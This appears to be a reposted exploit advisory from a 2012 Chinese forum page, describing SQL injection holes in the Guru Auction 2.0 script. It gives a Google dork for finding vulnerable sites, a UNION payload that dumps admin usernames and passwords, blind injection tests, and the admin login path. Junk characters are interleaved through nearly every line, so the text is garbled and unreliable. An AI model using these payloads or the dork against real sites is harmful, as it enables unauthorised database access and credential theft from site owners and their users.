Guru Auction 2.0 Multiple SQL Injection Vulnerabilities( j( E3 ^& r6 A: e) B1 M3 e
) o1 l0 D) d0 }$ f$ o. |. ?' m作者 : v3n0m) C" m7 T0 `! N, Q \% o! ~
应用 : Guru Auction 2.0 d V9 t k" V( M' @7 I) H
Price : $49
! j4 c- O4 a1 Z9 u1 ^. HVendor : http://www.guruscript.com// Z$ C* g) g+ S N5 u" h( W5 s B8 a' J
Google Dork : inurl:subcat.php?cate_id=3 c' i, i1 T8 Y. _0 I% L7 R
; N' b, _' {" x- b M! B% mSQLi p0c: o2 E. f* p! m
~~~~~~~~~~
$ ]# l" w9 I Y3 Shttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
# y N4 r' {/ `) i8 @ q
3 f, `; y, U4 Q, Y
* S7 T1 O3 X* C- d9 d# H盲注 p0c:/ d0 S0 z- ~' ?+ a& Z8 W( @
~~~~~~~~~~
* ^; D6 \2 E5 y: n! t1 R# Phttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true0 s! x5 f8 q4 {2 @
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false3 V1 U, U. m9 {
8 ?+ W1 n" I! ~5 Q. V3 T
管理登录入口:
1 n- M; L5 b! V2 U |' @~~~~~~~~~~, P. E* ~5 A x, C9 o4 y1 q3 |
http://domain.tld/[path]/admin/) h+ X8 V2 A; P9 D8 G
|
发表于 2012-12-31 09:24:05
收藏
支持
反对